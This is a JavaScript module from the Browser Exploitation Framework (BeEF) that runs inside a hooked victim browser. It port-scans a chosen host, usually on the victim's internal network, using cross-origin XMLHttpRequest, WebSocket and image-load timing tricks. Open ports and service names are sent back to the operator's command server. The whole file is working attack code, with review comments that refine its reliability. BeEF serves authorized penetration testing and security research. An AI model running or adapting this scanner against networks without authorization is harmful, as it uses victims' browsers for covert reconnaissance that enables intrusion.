//
// Copyright (c) 2006-2026 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {
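// Ports the scanner refuses to probe. The list appears to mirror a browser
// "restricted ports" table (those ports are rejected by the browser itself, so a
// probe would only produce a synchronous error, not a verdict).
// NOTE(review): the list is static while browsers keep extending theirs; ports
// such as 1720, 1723, 5060 below are in top_ports but may be refused by current
// browsers — confirm against the engines BeEF targets.
var blocked_ports = [ 1, 7, 9, 11, 13, 15, 17, 19, 20, 21, 22, 23, 25, 37, 42, 43, 53, 77, 79, 87, 95, 101, 102, 103, 104, 109, 110, 111, 113, 115, 117, 119, 123, 135, 139, 143, 179, 389, 465, 512, 513, 514, 515, 526, 530, 531, 532, 540, 556, 563, 587, 601, 636, 993, 995, 2049, 3659, 4045, 6000, 6665, 6666, 6667, 6668, 6669, 65535 ];

// Port set used when the operator selects 'default'.
var default_ports = [ 1,5,7,9,15,20,21,22,23,25,26,29,33,37,42,43,53,67,68,69,70,76,79,80,88,90,98,101,106,109,110,111,113,114,115,118,119,123,129,132,133,135,136,137,138,139,143,144,156,158,161,162,168,174,177,194,197,209,213,217,219,220,223,264,315,316,346,353,389,413,414,415,416,440,443,444,445,453,454,456,457,458,462,464,465,466,480,486,497,500,501,516,518,522,523,524,525,526,533,535,538,540,541,542,543,544,545,546,547,556,557,560,561,563,564,625,626,631,636,637,660,664,666,683,740,741,742,744,747,748,749,750,751,752,753,754,758,760,761,762,763,764,765,767,771,773,774,775,776,780,781,782,783,786,787,799,800,801,808,871,873,888,898,901,953,989,990,992,993,994,995,996,997,998,999,1000,1002,1008,1023,1024,1080,8080,8443,8050,3306,5432,1521,1433,3389,10088 ];

// Port number (as a string key) -> well-known service name, appended to OPEN
// reports. Keys are looked up with `port in default_services`, so they must be
// the bare decimal number: the former '1521 ' key (trailing space) never matched
// and is fixed here.
var default_services = {'1':'tcpmux', '5':'rje', '7':'echo', '9':'msn', '15':'netstat', '20':'ftp-data', '21':'ftp', '22':'ssh', '23':'telnet', '25':'smtp', '26':'rsftp', '29':'msgicp', '33':'dsp', '37':'time', '42':'nameserver', '43':'whois', '53':'domain', '67':'dhcps', '68':'dhcpc', '69':'tftp', '70':'gopher', '76':'deos', '79':'finger', '80':'http', '81':'hosts2-ns', '88':'kerberos-sec', '90':'dnsix', '98':'linuxconf', '101':'hostname', '106':'pop3pw', '109':'pop2', '110':'pop3', '111':'rpcbind', '113':'ident', '114':'audio news', '115':'sftp', '118':'sqlserv', '119':'nntp', '123':'ntp', '129':'pwdgen', '132':'cisco-sys', '133':'statsrv', '135':'msrpc', '136':'profile', '137':'netbios-ns', '138':'netbios-dgm', '139':'netbios-ssn', '143':'imap', '144':'news', '156':'sqlserv', '158':'pcmail-srv', '161':'snmp', '162':'snmp trap', '168':'rsvd', '174':'mailq', '177':'xdmcp', '194':'irc', '197':'dls', '199':'smux', '209':'tam', '213':'ipx', '217':'dbase', '219':'uarps', '220':'imap3', '223':'cdc', '264':'bgmp', '315':'dpsi', '316':'decauth', '346':'zserv', '353':'ndsauth', '389':'ldap', '413':'smsp', '414':'infoseek', '415':'bnet', '416':'silver platter', '440':'sgcp', '443':'https', '444':'snpp', '445':'microsoft-ds', '453':'creativeserver', '454':'content server', '456':'macon', '457':'scohelp', '458':'appleqtc', '462':'datasurfsrvsec', '464':'kpasswd5', '465':'smtps', '466':'digital-vrc', '480':'loadsrv', '486':'sstats', '497':'retrospect', '500':'isakmp', '501':'stmf', '515':'printer (spooler lpd)', '516':'videotex', '518':'ntalk', '522':'ulp', '523':'ibm-db2', '524':'ncp', '525':'timed', '526':'tempo', '533':'netwall', '535':'iiop', '538':'gdomap', '540':'uucp', '541':'uucp-rlogin', '542':'commerce', '543':'klogin', '544':'kshell', '545':'ekshell', '546':'dhcpconf', '547':'dhcpserv', '548':'afp', '556':'remotefs', '557':'openvms-sysipc', '560':'rmonitor', '561':'monitor', '563':'snews', '564':'9pfs', '587':'submission', '625':'apple-xsrvr-admin',
'626':'apple-imap-admin', '631':'ipp', '636':'ldapssl', '637':'lanserver', '660':'mac-srvr-admin', '664':'secure-aux-bus', '666':'doom', '683':'corba-iiop', '740':'netcp', '741':'netgw', '742':'netrcs', '744':'flexlm', '747':'fujitsu-dev', '748':'ris-cm', '749':'kerberos-adm', '750':'kerberos', '751':'kerberos_master', '752':'qrh', '753':'rrh', '754':'krb_prop', '758':'nlogin', '760':'krbupdate', '761':'kpasswd', '762':'quotad', '763':'cycleserv', '764':'omserv', '765':'webster', '767':'phonebook', '771':'rtip', '773':'submit', '774':'rpasswd', '775':'entomb', '776':'wpages', '780':'wpgs', '781':'hp-collector', '782':'hp-managed-node', '783':'spam assassin', '786':'concert', '787':'qsc', '799':'controlit', '800':'mdbs_daemon', '801':'device', '808':'ccproxy-http', '871':'supfilesrv', '873':'rsync', '888':'access builder', '898':'sun-manageconsole', '901':'samba-swat', '953':'rndc', '989':'ftps-data', '990':'ftps', '992':'telnets', '993':'imaps', '994':'ircs', '995':'pop3s', '996':'xtreelic', '997':'maitrd', '998':'busboy', '999':'garcon', '1000':'cadlock', '1002':'windows-icfw', '1008':'ufsd', '1023':'netvenuechat', '1024':'kdm', '1025':'NFS-or-IIS', '1080':'socks', '1433':'mssql', '1434':'ms-sql-m', '1521':'oracle', '1720':'h323q931', '1723':'pptp', '3306':'mysql', '3389':'ms-wbt-server', '4489':'radmin', '5000':'upnp', '5060':'sip', '5432':'postgres', '5900':'vnc', '6000':'x11', '6001':'X11:1', '6446':'mysql-proxy', '8050':'coldfusion', '8080':'http-proxy', '8443':'tomcat', '8888':'sun-answerbook', '9100':'HP JetDirect card', '10000':'snet-sensor-mgmt', '10088':'zend server', '11371':'hkp'};

// Top ports according to Fyodor's nmap research (nmap-services / open-frequency),
// used when the operator selects 'top'. default_services was extended to cover them.
// $ cat /usr/share/nmap/nmap-services | grep -vE "^#.+" | sort -r -k3 | grep "/tcp" | sed 's:/tcp::' | grep -v unknown | awk '{print $1" - "$2}'
var top_ports = [80, 23, 443, 21, 22, 25, 3389, 110, 445, 139, 143, 53, 135, 3306, 8080, 1723, 111, 995, 993, 5900, 1025, 587, 8888, 199, 1720, 465, 548, 113, 81, 6001, 10000, 5060, 515, 5000, 9100];

// Operator options, interpolated server-side (ERB) into string literals.
// NOTE(review): no escaping is visible at this layer, so an option value
// containing a quote or newline would break the generated script in the hooked
// browser — confirm the module's Ruby side validates these before rendering.
// All timing values arrive as strings; they are compared with numbers below,
// which coerces them, but any non-numeric value silently becomes NaN.
var host = '<%= @ipHost %>';
// TODO: Adjust times for each browser
var closetimeout = '<%= @closetimeout %>'; // ms: a probe that fails faster than this counts as "closed"
var opentimeout = '<%= @opentimeout %>';   // ms: a probe still pending after this counts as "open"/"timeout"
var delay = '<%= @delay %>';               // ms: extra gap between ports
var ports = '<%= @ports %>';               // 'default', 'top', 'a,b,c', 'a-b' or a single port
var debug = '<%= @debug %>';
// Scheme used by the <img> probe. NOTE(review): an ftp:// image load depends on
// the browser still supporting FTP, which current major browsers have dropped;
// verify this probe still discriminates before trusting its verdicts.
var protocol = 'ftp://';

// Per-port start times, written by the scheduler right before each probe.
var start_time_ws = undefined;
var start_time_cors = undefined;
var start_time_http = undefined;
var start_scan = undefined;
// Interval handles of the three per-port pollers.
var intID_http = undefined;
var intID_ws = undefined;
var intID_cors = undefined;

// Ports to scan, filled by prepare_ports().
var ports_list = [];

// Gap between launching consecutive ports. Radix given explicitly; note that a
// NaN here (non-numeric option) would make the scheduler's setInterval fire with
// no usable delay at all — presumably the Ruby side validates, verify.
var timeval = parseInt(opentimeout, 10) + parseInt(delay * 2, 10);

// Verdict of the current port for each probe:
// 0 : unknown
// 1 : closed
// 2 : open
// 3 : timeout
// 4 : blocked
var port_status_http = 0;
var port_status_ws = 0;
var port_status_cors = 0;
// True once the corresponding probe has settled on a verdict for the current port.
var process_port_http = false;
var process_port_ws = false;
var process_port_cors = false;
var count = 0;

// Most recent probe objects (Image, WebSocket, XMLHttpRequest) and the scheduler handle.
var img_scan = undefined;
var ws_scan = undefined;
var cs_scan = undefined;
var s = undefined;

// When true, every verdict (not only OPEN) is reported back for each method.
var debug_value = (debug === 'true');
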
function check_blocked(port_to_check)
{
  // True when `port_to_check` is one of the ports in `blocked_ports`, i.e. a
  // port the scanner must not probe. Loose equality is kept deliberately:
  // callers pass parseInt() results, but a numeric string still matches, just
  // as it did with the original loop.
  return blocked_ports.some(function (blocked)
  {
    return blocked == port_to_check;
  });
}

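function prepare_ports()
{
  // Turns the operator-supplied `ports` option into the numeric `ports_list`
  // that the scanner iterates over. Accepted forms:
  //   'default'  -> default_ports
  //   'top'      -> top_ports
  //   'a,b,c'    -> explicit list
  //   'a-b'      -> inclusive range
  //   'n'        -> single port
  // Every candidate is parsed as a base-10 integer after trimming and must fall
  // in 1..65535; blank, non-numeric or out-of-range entries are dropped so they
  // never reach the URL / WebSocket constructors. The previous version handed
  // raw strings through (e.g. ' 443' or 'abc'), and a leading ',' or '-' was
  // not recognised because the delimiter search required index > 0.
  // An empty result makes the caller abort the scan.
  var candidates = [];

  if (ports === 'default')
  {
    candidates = default_ports;
  }
  else if (ports === 'top')
  {
    candidates = top_ports;
  }
  else if (ports.indexOf(',') !== -1)
  {
    candidates = ports.split(',');
  }
  else if (ports.indexOf('-') !== -1)
  {
    var bounds = ports.split('-');
    var firstport = parseInt(bounds[0], 10);
    var lastport = parseInt(bounds[1], 10);
    // Clamp to the valid port space so a range like '1-99999999' cannot build a
    // huge array; NaN bounds or a reversed range simply yield no candidates.
    if (firstport < 1)
    {
      firstport = 1;
    }
    if (lastport > 65535)
    {
      lastport = 65535;
    }
    for (var p = firstport; p <= lastport; p++)
    {
      candidates.push(p);
    }
  }
  else
  {
    candidates = [ports];
  }

  ports_list = [];
  for (var i = 0; i < candidates.length; i++)
  {
    var value = parseInt(String(candidates[i]).trim(), 10);
    // NaN fails both comparisons, so non-numeric entries are filtered here too.
    if (value >= 1 && value <= 65535)
    {
      ports_list.push(value);
    }
  }
}
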
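function cors_scan(hostname, port_)
{
  // Probes hostname:port_ with a cross-origin XMLHttpRequest and classifies the
  // port by how long the request takes to reach DONE:
  //   DONE before closetimeout   -> closed (connection refused quickly)
  //   DONE after closetimeout    -> open (something accepted the TCP connection)
  //   not DONE by opentimeout    -> timeout (filtered, or a slow/odd service)
  // The response is never readable here (cross-origin), so this is a timing
  // heuristic, not proof. Verdicts land in port_status_cors / process_port_cors,
  // which the scheduler resets per port; only OPEN is always reported, the other
  // verdicts only when debug is on.
  if (check_blocked(parseInt(port_, 10)))
  {
    process_port_cors = true;
    port_status_cors = 4; // blocked
    if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is BLOCKED');}
    return;
  }

  // Keep this port's request, start time and timer in locals: the shared
  // globals are rewritten when the scheduler launches the next port, and a late
  // tick must not inspect or abort the wrong request.
  var started = start_time_cors;
  var request = new XMLHttpRequest();
  cs_scan = request;

  try
  {
    // open() throws synchronously (SyntaxError) when the URL does not parse,
    // e.g. a non-numeric or out-of-range port. Left uncaught, the exception
    // escapes into the scheduler's interval callback before `count` is advanced,
    // so the same port would be re-launched on every tick.
    request.open('GET', "http://" + hostname + ":" + port_, true);
    request.send(null);
  }
  catch (e)
  {
    process_port_cors = true;
    port_status_cors = 4; // blocked: the browser refused to issue the request
    if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is BLOCKED (' + e.name + ')');}
    return;
  }

  var poll = setInterval(
  function ()
  {
    var interval = (new Date).getTime() - started;
    if (process_port_cors)
    {
      clearInterval(poll);
      return;
    }

    // XMLHttpRequest readyState: 0 UNSENT, 1 OPENED, 2 HEADERS_RECEIVED,
    // 3 LOADING, 4 DONE. Only DONE carries information for this probe; a refused
    // connection and a completed (or CORS-rejected) response both end in DONE,
    // so the elapsed time is what separates them.
    if (request.readyState === 4)
    {
      clearInterval(poll);
      process_port_cors = true;
      if (interval < closetimeout)
      {
        port_status_cors = 1; // closed
        if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is CLOSED');}
      }
      else
      {
        port_status_cors = 2; // open
        var known_service = "";
        if (port_ in default_services)
        {
          known_service = "(" + default_services[port_] + ")";
        }
        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is OPEN ' + known_service, beef.are.status_success());
      }
      // Return here so a request that completed on the same tick opentimeout
      // elapsed is not re-labelled as a timeout below (the old code fell through).
      return;
    }

    if (interval >= opentimeout)
    {
      clearInterval(poll);
      process_port_cors = true;
      port_status_cors = 3; // timeout
      if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is TIMEOUT');}
      // Do not let the pending request outlive its probe; the readyState change
      // caused by abort() is ignored because the poller is already cleared.
      request.abort();
    }
  }
  , 1);
  intID_cors = poll;
}
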
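function websocket_scan(hostname, port_)
{
  // WebSocket probe of hostname:port_. The browser exposes no error detail for a
  // failed WebSocket, so the verdict comes from readyState and timing:
  //   CLOSED before closetimeout  -> closed (refused quickly)
  //   CLOSED after closetimeout   -> open (TCP accepted, handshake then failed)
  //   OPEN                        -> open (a WebSocket server completed the handshake)
  //   nothing by opentimeout      -> timeout
  // Verdicts land in port_status_ws / process_port_ws (reset per port by the
  // scheduler). Only OPEN is always reported; other verdicts only with debug.
  if (check_blocked(parseInt(port_, 10)))
  {
    process_port_ws = true;
    port_status_ws = 4; // blocked
    if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is BLOCKED');}
    return;
  }

  var socket = undefined;
  try
  {
    // Prefer the standard constructor and fall back to the old Firefox prefix;
    // opening both (as the previous code did when both existed) leaked a socket.
    if ("WebSocket" in window)
    {
      socket = new WebSocket("ws://" + hostname + ":" + port_);
    }
    else if ("MozWebSocket" in window)
    {
      socket = new MozWebSocket("ws://" + hostname + ":" + port_);
    }
  }
  catch (e)
  {
    // The constructor can throw synchronously (per spec a SecurityError for a
    // port on the browser's own restricted list, which in current browsers is
    // wider than blocked_ports, or a SyntaxError for an unparsable URL).
    // Uncaught, the exception escapes into the scheduler's interval callback
    // before `count` is advanced, so the same port would be re-launched forever.
    process_port_ws = true;
    port_status_ws = 4; // blocked
    if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is BLOCKED (' + e.name + ')');}
    return;
  }

  if (!socket)
  {
    // No WebSocket implementation: leave the verdict unknown (0) rather than
    // start a poller that would only throw on socket.readyState.
    process_port_ws = true;
    port_status_ws = 0; // unknown
    if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is UNKNOWN (no WebSocket support)');}
    return;
  }
  ws_scan = socket;

  // Keep this port's socket, start time and timer in locals: the shared globals
  // are rewritten when the scheduler launches the next port, and a late tick
  // must not inspect or close the socket created for another port.
  var started = start_time_ws;
  var poll = setInterval(
  function ()
  {
    var interval = (new Date).getTime() - started;

    if (process_port_ws)
    {
      clearInterval(poll);
      return;
    }

    var known_service = "";
    if (port_ in default_services)
    {
      known_service = "(" + default_services[port_] + ")";
    }

    // WebSocket readyState: 0 CONNECTING, 1 OPEN, 2 CLOSING, 3 CLOSED.
    if (socket.readyState === 1) // OPEN: the handshake completed, which is conclusive
    {
      clearInterval(poll);
      process_port_ws = true;
      port_status_ws = 2; // open
      beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is OPEN ' + known_service + ' [WebSocket handshake completed]');
      socket.close();
      return;
    }

    if (socket.readyState === 3) // CLOSED: refused, or accepted and then failed the handshake
    {
      clearInterval(poll);
      process_port_ws = true;
      if (interval < closetimeout)
      {
        port_status_ws = 1; // closed
        if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is CLOSED');}
      }
      else
      {
        port_status_ws = 2; // open
        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is OPEN ' + known_service);
      }
      socket.close();
      // Return so a socket that closed on the same tick opentimeout elapsed is
      // not re-labelled as a timeout below (the old code fell through).
      return;
    }

    if (interval >= opentimeout)
    {
      clearInterval(poll);
      process_port_ws = true;
      port_status_ws = 3; // timeout
      if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is TIMEOUT');}
      socket.close();
    }
  }
  , 1);
  intID_ws = poll;
}
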
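function http_scan(protocol_, hostname, port_)
{
  // Image-load probe of protocol_ + hostname:port_. The verdict is timing-based:
  //   error/load event before closetimeout -> closed (refused quickly)
  //   no event by opentimeout              -> open (something holds the connection)
  // onload is wired to the same handler as onerror, so a port that actually
  // serves an image is classified by timing like any other. Only OPEN is always
  // reported; CLOSED only with debug. Verdicts land in port_status_http /
  // process_port_http, which the scheduler resets per port.
  //
  // Everything this probe needs is captured in locals: the previous version read
  // the shared start_time_http / intID_http from the event handler, so an error
  // arriving after the probe had already been reported as OPEN (the browser keeps
  // loading until its own network timeout) was measured against the NEXT port's
  // start time, reported the old port as CLOSED and cleared the new port's poller.
  var started = start_time_http;
  var finished = false;
  var probe = new Image();
  img_scan = probe;

  probe.onerror = function(evt)
  {
    if (finished)
    {
      return;
    }
    var interval = (new Date).getTime() - started;

    if (interval < closetimeout)
    {
      finished = true;
      if (process_port_http == false)
      {
        port_status_http = 1; // closed
        if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=HTTP: Port ' + port_ + ' is CLOSED');}
        clearInterval(poll);
      }
      process_port_http = true;
    }
    // A slower failure says nothing by itself; the poller below decides at opentimeout.
  };

  probe.onload = probe.onerror;

  probe.src = protocol_ + hostname + ":" + port_;

  var poll = setInterval(
  function ()
  {
    var interval = (new Date).getTime() - started;

    if (interval < opentimeout)
    {
      return;
    }
    clearInterval(poll);
    if (finished)
    {
      return;
    }
    finished = true;
    // Detach the handlers: the request may still be in flight, and a late event
    // must not be attributed to whatever port the scanner has moved on to.
    probe.onerror = null;
    probe.onload = null;
    img_scan = undefined;

    if (process_port_http == false)
    {
      port_status_http = 2; // open
      process_port_http = true;
    }
    var known_service = "";
    if (port_ in default_services)
    {
      known_service = "(" + default_services[port_] + ")";
    }
    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=HTTP: Port ' + port_ + ' is OPEN ' + known_service);
  }
  , 1);
  intID_http = poll;
}
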
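// Scheduler: resolve the port list, announce the scan, then launch the three
// probes for one port every `timeval` ms and report completion once the last
// port's probes have had opentimeout to settle.
prepare_ports();

if (ports_list.length < 1)
{
  beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=Scan aborted, no valid ports provided to scan');
  return;
}

// `var` added: this was an implicit global (a ReferenceError in strict mode).
var desc = '';
if (ports === 'default' || ports === 'top')
{
  desc = ports + ' ports on ';
}
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=Scanning ' + desc + host+' [ports: ' + ports_list + ']');

count = 0;
start_scan = (new Date).getTime();

s = setInterval(
function()
{
  // Fresh per-port state BEFORE launching: the three probes share these flags,
  // and resetting them right after the launch (as the old code did) wiped a
  // verdict a probe had already set synchronously (e.g. "blocked").
  port_status_http = 0; // unknown
  process_port_http = false;
  port_status_ws = 0; // unknown
  process_port_ws = false;
  port_status_cors = 0; // unknown
  process_port_cors = false;

  if (count < ports_list.length)
  {
    var current = ports_list[count];
    start_time_cors = (new Date).getTime();
    cors_scan(host, current);
    start_time_ws = (new Date).getTime();
    websocket_scan(host, current);
    start_time_http = (new Date).getTime();
    http_scan(protocol, host, current);
  }

  count++;

  if (count >= ports_list.length)
  {
    clearInterval(s);
    // Give the last port's probes (bounded by opentimeout) time to settle, and
    // measure the elapsed time when reporting rather than at launch, so the
    // figure includes the final probes.
    setTimeout(function()
    {
      var elapsed = (new Date).getTime() - start_scan;
      beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Scan Finished in ' + elapsed + ' ms');
    }, opentimeout*2);
  }
}
,timeval);
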
});